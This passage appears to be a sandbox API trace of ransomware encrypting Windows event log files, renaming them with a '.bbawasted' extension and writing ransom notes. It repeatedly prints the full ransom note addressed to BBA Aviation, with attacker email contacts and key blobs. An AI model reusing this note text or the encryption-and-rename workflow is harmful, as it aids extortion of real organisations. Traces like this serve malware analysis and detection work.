KEY:\r\n[begin_key]Mom3PgsCsR1UD4P/zN1PbhXOHkm4HVm8Fih69Vl6mwdSkkTgjGpP+vbl2HV4CXxT\r\nFoOpIIgapsXi9qX+LXzfcdMbnMLa5FuIwM6fkht8gf2sK+EMLlwjzfAldUtK/Dax\r\nJbagY14556JO8vxkU9ImnSn6wtwJCbH2hYB/nwLouPCpprfShiLKK5mn66bj5zv6\r\nIJ2+GWd6k1FZpn/AYyDPiMhUvB6p0FSf854YRHjHcZFAoZkf6LJIZ6ZZdSUCFe7W\r\nqZZsbbEoh+DNsYf05W6gMPfqXYFMcHpYYq9+y1jqvAwS6wlSgKXAZFDoWAdMD5uF\r\n88pyKaq5JRkvbH0rikaWT4p49BvaSoW49AsnnbWf1U+SPNcFrbvKvOXLi/Y45B46\r\nlxSIWoT5VuwqwuwhTlju6HNFYzXrdDKpev+Z2xPMBiUvnShMSvq14CEYjvxSy5KO\r\ne3UMPUlsbaH1PruDcErO3Mm4VKAeOMAJ1qvCh1g0AbgScTSXmjD5cVmiAb54Bt7i\r\nYrOOFE6lIq3EYYYnQrSjAXCJ5gysvOO7/ucxJYXgQtwaOI7/Wxw6uTmrtz0wVh41\r\n7JyQK1vVhr9pBOXH72ipPx9o6GPDgqpNlsm4y81ICw73Y9C6/YM0zLFGHKC63wzh\r\neP3YAFF3oaWd8qVYZCXgcQsASMYOnrgJeE1GDH3QOFf=[end_key]\r\nKEEP IT\r\n") returned 984 [0196.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0196.993] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0196.993] SetEndOfFile (hFile=0x28c) returned 1 [0196.996] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0196.996] CloseHandle (hObject=0x28c) returned 1 [0197.000] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0197.000] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a1538 | out: hHeap=0x660000) returned 1 [0197.000] _aulldvrm () returned 0x0 [0197.000] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a62c8) returned 1 [0197.001] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0197.001] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0197.001] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned 58 [0197.001] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27e) returned 0x6aecf0 [0197.002] lstrcpyW (in: lpString1=0x6aed64, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0197.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0197.002] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6350) returned 1 [0197.002] CryptGenRandom (in: hProv=0x6a6350, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0197.002] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0197.002] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0197.003] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0197.086] SetEndOfFile (hFile=0x28c) returned 1 [0197.086] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.086] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0197.086] lstrcpyW (in: lpString1=0x6aed64, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0197.086] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx.bbawasted")) returned 1 [0197.087] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-smbserver%4connectivity.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0197.088] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0197.088] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0197.088] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0197.088] CloseHandle (hObject=0x294) returned 1 [0197.095] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0197.096] CloseHandle (hObject=0x280) returned 1 [0197.096] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0197.096] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6240) returned 1 [0197.096] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0197.097] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0197.097] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6350) returned 1 [0197.097] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0197.097] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0197.109] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0197.109] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0197.109] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0197.109] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]VZuqDRALoPGikFbYQohZpjeaQyDAGBdNRb67k3qigzD/okOHrvtJH0FOqcdhOiug\r\nlFv1/vpo0t8lGr/E0oLHef9gV7XzqP5hMTvoAXpi3w7suATrHazh/rsTbCjIAw26\r\nZbKoXLGDOuvrnlPe6pOa2BSnegLV6mNWcgad+1pDFLHUulgxV0dIp3B6wSyTG7g6\r\nmxAZFIHFIGQxbLxBVY3pMbIoinmjdQW2sk/SViNIKhZ9WvE4txvu6wTkWldnW7Qw\r\nUASy9Hir0e4Add9qF46BE73zmb7AWbqINCkzgVOn4Ycgeo0Rt0y0XK58knN4kNl4\r\nynVOa71ctuxFOqmn6BMv7NIWVNXTQJoyW+3NLJQLLVZlgZcnLPQ+SJ3lqjEF1xf2\r\nfSRjPCIuhpTqHBBX3wO7x/CNnKtZtG4cXAby0VA4e+lmQ88d3orT+BTdLgScnVbk\r\n3UKHKBFF2YQ3d1bDORDpVcLh8kUoZGO9f79qCicN/gMTFGaHf5Md1ps87b4HJ15k\r\n9Gc7xlBOTktmzfSOYt3yJV/RdBt9n9UjzTPJuB5pv8BUTraIOYTu5qxRHYmvXi/x\r\nontM82kmDX0tybPl/d1vRGrDYqCru+7arEI00IXVwLYef6Kwf1VL4Tt+GskRu33m\r\n9wCWqHk3gIyQAyhKiC351RYyOz4f1QhtsGpwzluKI1W=[end_key]\r\nKEEP IT\r\n") returned 984 [0197.109] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0197.109] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0197.109] SetEndOfFile (hFile=0x28c) returned 1 [0197.112] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0197.112] CloseHandle (hObject=0x28c) returned 1 [0197.116] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0197.116] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69f5d8 | out: hHeap=0x660000) returned 1 [0197.116] _aulldvrm () returned 0x0 [0197.116] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6240) returned 1 [0197.117] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0197.117] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0197.117] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 57 [0197.117] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27c) returned 0x6aecf0 [0197.117] lstrcpyW (in: lpString1=0x6aed62, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0197.117] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0197.117] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6020) returned 1 [0197.118] CryptGenRandom (in: hProv=0x6a6020, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0197.118] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0197.118] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0197.119] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0197.120] SetEndOfFile (hFile=0x28c) returned 1 [0197.120] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.120] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0197.121] lstrcpyW (in: lpString1=0x6aed62, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0197.121] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx.bbawasted")) returned 1 [0197.122] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0197.122] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0197.122] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0197.122] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0197.122] CloseHandle (hObject=0x280) returned 1 [0197.197] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0197.198] CloseHandle (hObject=0x294) returned 1 [0197.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0197.198] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6130) returned 1 [0197.199] CryptGenRandom (in: hProv=0x6a6130, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0197.199] CryptReleaseContext (hProv=0x6a6130, dwFlags=0x0) returned 1 [0197.199] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a62c8) returned 1 [0197.200] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0197.200] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0197.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0197.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0197.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0197.211] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]BUb8uB/4J2v2xppnWTsqFOR77BlKR/5QvkIA6QqAcbJZichopxkkJg3lAp56ovSF\r\nMgrodwjTWRp1nKFBUOv1Ln2wXgyv7xB2l11mqmCAJsiXySVVN7IJv7LSZ8UYjtNP\r\nCULSlU7dWOxkz9jfzgVzAd/xfkTZo/g3EmsnWmCKdUdAXlCuDCfoLTUoBk2p+IIw\r\nM5yG+faXLGB7T1cOCGn7aiJrFP+uo1TkpmLheMp2yywRTPWBvsAJNn6AGU4tEsd0\r\nMWROYVfgr99DhUE0OUtSGx1BnmN6nahcJg6a/2KsqQ5csCDKfoIyLHqoR/AOGJf2\r\nBRy73poz7/NfMPIbgpFcHqvXiQVdqWv8ewcI9iAPs7KhgpMwlNfpcole4oLIov+E\r\njt1s+yHHSngcRBt0ryyH+9qIXk0t9NonKbw4MgQIR+ULi2aOROATfyVOHD0/nMJT\r\nZ1jqD8PHqi+rUnHi+OE+pfOYtrp2yXBwgRujryw8D5kfnbdOq88PuRpPYdvZ3ESr\r\nMzzEV2HFbQ3mGyaLOHIK+RRjAR9U0mlWL49YduJg0m9uz42kJbrqauNMH6HzfpJh\r\n/ZQJ0xeAbru3wm0s7skVslech4rLI/1dIVqZ/pQG9oyhsYZUGuS3qi/oC8ETujZN\r\nICI01htmIe93LLJ2PIjxA2RAEOxHKR66OMXvnre5RYC=[end_key]\r\nKEEP IT\r\n") returned 984 [0197.212] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0197.212] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0197.212] SetEndOfFile (hFile=0x28c) returned 1 [0197.215] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0197.215] CloseHandle (hObject=0x28c) returned 1 [0197.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0197.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aaa58 | out: hHeap=0x660000) returned 1 [0197.218] _aulldvrm () returned 0x0 [0197.218] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6350) returned 1 [0197.219] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0197.219] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0197.219] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned 54 [0197.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x276) returned 0x6aecf0 [0197.219] lstrcpyW (in: lpString1=0x6aed5c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0197.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0197.220] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6020) returned 1 [0197.220] CryptGenRandom (in: hProv=0x6a6020, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0197.220] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0197.220] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0197.222] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0197.224] SetEndOfFile (hFile=0x28c) returned 1 [0197.224] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0197.224] lstrcpyW (in: lpString1=0x6aed5c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0197.224] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx.bbawasted")) returned 1 [0197.225] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0197.225] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0197.225] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0197.226] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0197.226] CloseHandle (hObject=0x294) returned 1 [0197.290] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0197.291] CloseHandle (hObject=0x280) returned 1 [0197.291] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0197.291] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6928) returned 1 [0197.292] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0197.292] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0197.292] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6020) returned 1 [0197.292] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0197.292] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0197.304] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0197.304] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0197.304] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0197.304] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]XpOg36MNmHEH8HdXJELpvRQVoh+ueAvJU3UpDIW3eKjyj1lnL705JvRF66d2C12x\r\nK/2laM23HJv9e/l3bG1k7GHb4heXohslZzxMAFXO3G8Vik7tB8URebLTZswqK2jx\r\nOCpWO1ILdvKLQhyU9m4SB5WhBsJ/sx4YPiPb/4TguSMLwXwCJjO13OIC/euYVS+R\r\nbluv43y28rcdXeVAg7rDsJavBwyNXtz0eHgtOH8DXJG1BRhOYJlEVRQajFU19QJO\r\npMs8DoZH/fDGV3ywwC5pAZgWmcOxeFlhIW366BdZdLkW79XFVjLc2XYYhUvahxqE\r\nguFvPH0I5aHKYdUlKgfw6xi6wIXPsyZ3EOsFsrD3ekd2RrBgT0gxW/PasHwcq6u2\r\nmKUH+mcdQNxDiSehlqjJqFNsHzcXRbLiTdHqHEF4UhPm1JO4aPySgRMaL7ItmUue\r\nxCCwOLFlfA5LBFVxrHj8ibjy0Z9e7rsbebeYEoV5SvqfYVjLe1lk/lbfHUzfd0+d\r\ngxjKk3Ha19s95Y3HsERa/7R9gqfgmK8f/bGgTSJof2TD0QnrNhzLNlISwuRICMdV\r\nHy63ertxkYAxM8+9EZZ5n9/iuOhDNNghRBsh0vbw/iQv3/Tdbho7mljiRaGLpOJK\r\nvtLI4dVriUz1eSEflRuVRB8VwGDUexWtUuavLa+TQbu=[end_key]\r\nKEEP IT\r\n") returned 984 [0197.304] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0197.304] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0197.305] SetEndOfFile (hFile=0x28c) returned 1 [0197.307] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0197.307] CloseHandle (hObject=0x28c) returned 1 [0197.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0197.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69f6a8 | out: hHeap=0x660000) returned 1 [0197.312] _aulldvrm () returned 0x0 [0197.312] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6a38) returned 1 [0197.313] CryptGenRandom (in: hProv=0x6a6a38, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0197.313] CryptReleaseContext (hProv=0x6a6a38, dwFlags=0x0) returned 1 [0197.313] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 53 [0197.313] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x274) returned 0x6aecf0 [0197.313] lstrcpyW (in: lpString1=0x6aed5a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0197.313] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0197.314] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, 